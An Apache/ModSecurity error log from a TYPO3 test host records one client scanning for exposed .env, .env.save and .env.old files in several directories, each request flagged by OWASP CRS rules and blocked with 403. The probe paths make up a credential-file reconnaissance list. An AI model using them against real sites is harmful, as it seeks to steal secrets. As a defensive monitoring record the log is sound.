[Fri Nov 21 10:13:08.721760 2025] [:error] [pid 229744] [client 15.223.224.122:53426] [client 15.223.224.122] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 10 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 10, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/system/.env.old"] [unique_id "aSAtJIml-svsT9-_8bDeEwAAAAY"]
[Fri Nov 21 10:13:12.814172 2025] [:error] [pid 224149] [client 15.223.224.122:55420] [client 15.223.224.122] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /plugins/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/plugins/.env"] [unique_id "aSAtKMsPY-oBfuAti3FYxgAAAAU"]
[Fri Nov 21 10:13:12.814410 2025] [:error] [pid 224149] [client 15.223.224.122:55420] [client 15.223.224.122] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/plugins/.env"] [unique_id "aSAtKMsPY-oBfuAti3FYxgAAAAU"]
[Fri Nov 21 10:13:12.814584 2025] [:error] [pid 224149] [client 15.223.224.122:55420] [client 15.223.224.122] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/plugins/.env"] [unique_id "aSAtKMsPY-oBfuAti3FYxgAAAAU"]
[Fri Nov 21 10:13:12.845838 2025] [:error] [pid 223952] [client 15.223.224.122:55444] [client 15.223.224.122] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /core/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/core/.env"] [unique_id "aSAtKJIgILTHWk6gdY_zWgAAAAA"]
[Fri Nov 21 10:13:12.846044 2025] [:error] [pid 223952] [client 15.223.224.122:55444] [client 15.223.224.122] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/core/.env"] [unique_id "aSAtKJIgILTHWk6gdY_zWgAAAAA"]
[Fri Nov 21 10:13:12.846215 2025] [:error] [pid 223952] [client 15.223.224.122:55444] [client 15.223.224.122] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/core/.env"] [unique_id "aSAtKJIgILTHWk6gdY_zWgAAAAA"]
[Fri Nov 21 10:13:12.860000 2025] [:error] [pid 224164] [client 15.223.224.122:55454] [client 15.223.224.122] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /core/.env.save"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/core/.env.save"] [unique_id "aSAtKHwkd7Eed7ZXqoT4fwAAAAw"]
[Fri Nov 21 10:13:12.860203 2025] [:error] [pid 224164] [client 15.223.224.122:55454] [client 15.223.224.122] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/core/.env.save"] [unique_id "aSAtKHwkd7Eed7ZXqoT4fwAAAAw"]
[Fri Nov 21 10:13:12.860377 2025] [:error] [pid 224164] [client 15.223.224.122:55454] [client 15.223.224.122] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/core/.env.save"] [unique_id "aSAtKHwkd7Eed7ZXqoT4fwAAAAw"]
[Fri Nov 21 10:13:12.927438 2025] [:error] [pid 223954] [client 15.223.224.122:55530] [client 15.223.224.122] ModSecurity: Warning. String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .rdb/ .resources/ .resx/ .sql/ .swp/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/share/modsecurity-crs/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "997"] [id "920440"] [msg "URL file extension is restricted by policy"] [data ".old"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "surf.test.indacotrentino.com"] [uri "/core/.env.old"] [unique_id "aSAtKIPLQdWysfkg-aEKBQAAAAI"]
[Fri Nov 21 10:13:12.927604 2025] [:error] [pid 223954] [client 15.223.224.122:55530] [client 15.223.224.122] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /core/.env.old"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/core/.env.old"] [unique_id "aSAtKIPLQdWysfkg-aEKBQAAAAI"]
[Fri Nov 21 10:13:12.927810 2025] [:error] [pid 223954] [client 15.223.224.122:55530] [client 15.223.224.122] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 10)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/core/.env.old"] [unique_id "aSAtKIPLQdWysfkg-aEKBQAAAAI"]
[Fri Nov 21 10:13:12.928004 2025] [:error] [pid 223954] [client 15.223.224.122:55530] [client 15.223.224.122] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 10 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 10, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/core/.env.old"] [unique_id "aSAtKIPLQdWysfkg-aEKBQAAAAI"]
[Fri Nov 21 10:13:13.001168 2025] [authz_core:error] [pid 224163] [client 15.223.224.122:55468] AH01630: client denied by server configuration: /var/www/surf/TYPO3/public/core
[Fri Nov 21 10:13:13.055777 2025] [:error] [pid 223955] [client 15.223.224.122:55654] [client 15.223.224.122] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /plugins/.env.save"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/plugins/.env.save"] [unique_id "aSAtKTEUbh-dzxMTkK_x6wAAAAM"]
[Fri Nov 21 10:13:13.056005 2025] [:error] [pid 223955] [client 15.223.224.122:55654] [client 15.223.224.122] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/plugins/.env.save"] [unique_id "aSAtKTEUbh-dzxMTkK_x6wAAAAM"]
[Fri Nov 21 10:13:13.056177 2025] [:error] [pid 223955] [client 15.223.224.122:55654] [client 15.223.224.122] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/plugins/.env.save"] [unique_id "aSAtKTEUbh-dzxMTkK_x6wAAAAM"]
[Fri Nov 21 10:13:13.132287 2025] [:error] [pid 223953] [client 15.223.224.122:55642] [client 15.223.224.122] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /modules/.env.save"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/modules/.env.save"] [unique_id "aSAtKT27u3u2us0kkkbyAwAAAAE"]
[Fri Nov 21 10:13:13.132497 2025] [:error] [pid 223953] [client 15.223.224.122:55642] [client 15.223.224.122] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/modules/.env.save"] [unique_id "aSAtKT27u3u2us0kkkbyAwAAAAE"]
[Fri Nov 21 10:13:13.132673 2025] [:error] [pid 223953] [client 15.223.224.122:55642] [client 15.223.224.122] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/modules/.env.save"] [unique_id "aSAtKT27u3u2us0kkkbyAwAAAAE"]
[Fri Nov 21 10:13:13.157563 2025] [authz_core:error] [pid 224162] [client 15.223.224.122:55546] AH01630: client denied by server configuration: /var/www/surf/TYPO3/public/modules
[Fri Nov 21 10:13:13.383262 2025] [:error] [pid 229737] [client 15.223.224.122:55542] [client 15.223.224.122] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /modules/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/modules/.env"] [unique_id "aSAtKeSNO7cObITHQGDnrQAAAAQ"]
[Fri Nov 21 10:13:13.383500 2025] [:error] [pid 229737] [client 15.223.224.122:55542] [client 15.223.224.122] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/modules/.env"] [unique_id "aSAtKeSNO7cObITHQGDnrQAAAAQ"]
[Fri Nov 21 10:13:13.384287 2025] [:error] [pid 229737] [client 15.223.224.122:55542] [client 15.223.224.122] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/modules/.env"] [unique_id "aSAtKeSNO7cObITHQGDnrQAAAAQ"]
[Fri Nov 21 10:13:13.495627 2025] [:error] [pid 229744] [client 15.223.224.122:55522] [client 15.223.224.122] ModSecurity: Warning. String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .rdb/ .resources/ .resx/ .sql/ .swp/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/share/modsecurity-crs/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "997"] [id "920440"] [msg "URL file extension is restricted by policy"] [data ".old"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "surf.test.indacotrentino.com"] [uri "/modules/.env.old"] [unique_id "aSAtKYml-svsT9-_8bDeFAAAAAY"]
[Fri Nov 21 10:13:13.495795 2025] [:error] [pid 229744] [client 15.223.224.122:55522] [client 15.223.224.122] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /modules/.env.old"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/modules/.env.old"] [unique_id "aSAtKYml-svsT9-_8bDeFAAAAAY"]
[Fri Nov 21 10:13:13.495997 2025] [:error] [pid 229744] [client 15.223.224.122:55522] [client 15.223.224.122] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 10)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/modules/.env.old"] [unique_id "aSAtKYml-svsT9-_8bDeFAAAAAY"]
[Fri Nov 21 10:13:13.496163 2025] [:error] [pid 229744] [client 15.223.224.122:55522] [client 15.223.224.122] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 10 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 10, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/modules/.env.old"] [unique_id "aSAtKYml-svsT9-_8bDeFAAAAAY"]
[Fri Nov 21 10:13:13.563005 2025] [:error] [pid 224164] [client 15.223.224.122:55928] [client 15.223.224.122] ModSecurity: Warning. String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .rdb/ .resources/ .resx/ .sql/ .swp/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/share/modsecurity-crs/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "997"] [id "920440"] [msg "URL file extension is restricted by policy"] [data ".old"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "surf.test.indacotrentino.com"] [uri "/plugins/.env.old"] [unique_id "aSAtKXwkd7Eed7ZXqoT4gAAAAAw"]
[Fri Nov 21 10:13:13.563160 2025] [:error] [pid 224164] [client 15.223.224.122:55928] [client 15.223.224.122] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /plugins/.env.old"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/plugins/.env.old"] [unique_id "aSAtKXwkd7Eed7ZXqoT4gAAAAAw"]
[Fri Nov 21 10:13:13.563378 2025] [:error] [pid 224164] [client 15.223.224.122:55928] [client 15.223.224.122] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 10)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/plugins/.env.old"] [unique_id "aSAtKXwkd7Eed7ZXqoT4gAAAAAw"]
[Fri Nov 21 10:13:13.563536 2025] [:error] [pid 224164] [client 15.223.224.122:55928] [client 15.223.224.122] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 10 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 10, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/plugins/.env.old"] [unique_id "aSAtKXwkd7Eed7ZXqoT4gAAAAAw"]
[Fri Nov 21 10:13:13.879281 2025] [authz_core:error] [pid 223952] [client 15.223.224.122:56136] AH01630: client denied by server configuration: /var/www/surf/TYPO3/public/plugins
[Fri Nov 21 10:13:17.140725 2025] [:error] [pid 224149] [client 15.223.224.122:57890] [client 15.223.224.122] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /vendor/.env.save"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/vendor/.env.save"] [unique_id "aSAtLcsPY-oBfuAti3FYxwAAAAU"]
[Fri Nov 21 10:13:17.140948 2025] [:error] [pid 224149] [client 15.223.224.122:57890] [client 15.223.224.122] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/vendor/.env.save"] [unique_id "aSAtLcsPY-oBfuAti3FYxwAAAAU"]
[Fri Nov 21 10:13:17.141127 2025] [:error] [pid 224149] [client 15.223.224.122:57890] [client 15.223.224.122] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/vendor/.env.save"] [unique_id "aSAtLcsPY-oBfuAti3FYxwAAAAU"]
[Fri Nov 21 10:13:17.901317 2025] [:error] [pid 224162] [client 15.223.224.122:57978] [client 15.223.224.122] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /themes/.env.save"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/themes/.env.save"] [unique_id "aSAtLU_9oHP6AInZ0COzLwAAAAo"]
[Fri Nov 21 10:13:17.901535 2025] [:error] [pid 224162] [client 15.223.224.122:57978] [client 15.223.224.122] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/themes/.env.save"] [unique_id "aSAtLU_9oHP6AInZ0COzLwAAAAo"]
[Fri Nov 21 10:13:17.901696 2025] [:error] [pid 224162] [client 15.223.224.122:57978] [client 15.223.224.122] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/themes/.env.save"] [unique_id "aSAtLU_9oHP6AInZ0COzLwAAAAo"]
[Fri Nov 21 10:13:17.923262 2025] [authz_core:error] [pid 229744] [client 15.223.224.122:58090] AH01630: client denied by server configuration: /var/www/surf/TYPO3/public/themes
[Fri Nov 21 10:13:17.991968 2025] [authz_core:error] [pid 224164] [client 15.223.224.122:57966] AH01630: client denied by server configuration: /var/www/surf/TYPO3/public/vendor
